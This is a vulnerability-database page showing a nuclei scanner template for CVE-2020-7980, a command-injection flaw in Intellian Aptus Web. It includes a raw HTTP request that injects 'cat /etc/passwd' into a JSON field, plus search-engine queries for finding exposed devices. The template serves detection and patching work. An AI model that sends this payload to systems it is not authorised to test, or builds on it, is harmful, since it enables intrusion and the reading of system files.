Lucene search
K

Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 105 Views

Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution vulnerabilit

Related
Refs
Code
id: CVE-2020-7980

info:
  name: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution
  author: ritikchaddha
  severity: critical
  description: 'Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed.'
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: |
    Upgrade to a patched version of Satellian Intellian Aptus Web (version > 1.24).
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-7980
    - https://sku11army.blogspot.com/2020/01/intellian-aptus-web-rce-intellian.html
    - https://github.com/Xh4H/Satellian-CVE-2020-7980
    - http://packetstormsecurity.com/files/156143/Satellian-1.12-Remote-Code-Execution.html
    - https://github.com/0xT11/CVE-POC
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-7980
    cwe-id: CWE-78
    epss-score: 0.82956
    epss-percentile: 0.99631
    cpe: cpe:2.3:a:intelliantech:aptus_web:1.24:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: intelliantech
    product: aptus_web
    shodan-query:
      - http.title:"Intellian Aptus Web"
      - http.title:"intellian aptus web"
    fofa-query: title="intellian aptus web"
    google-query: intitle:"intellian aptus web"
  tags: cve2020,cve,intellian,aptus,packetstorm,satellian,rce,intelliantech,vkev,vuln

http:
  - raw:
      - |
        POST /cgi-bin/libagent.cgi?type=J HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Cookie: ctr_t=0; sid=123456789

        {"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1}

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206ee6f9416f32e3d23288bac72d2ac73243722a70f4a36584dd6c834cb9aabb39022100d08a9e62b2321a52f51fc0c49f237bf3c8bb936c544b737b998e7b03c0fd3647:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8
CVSS 210
EPSS0.82956
105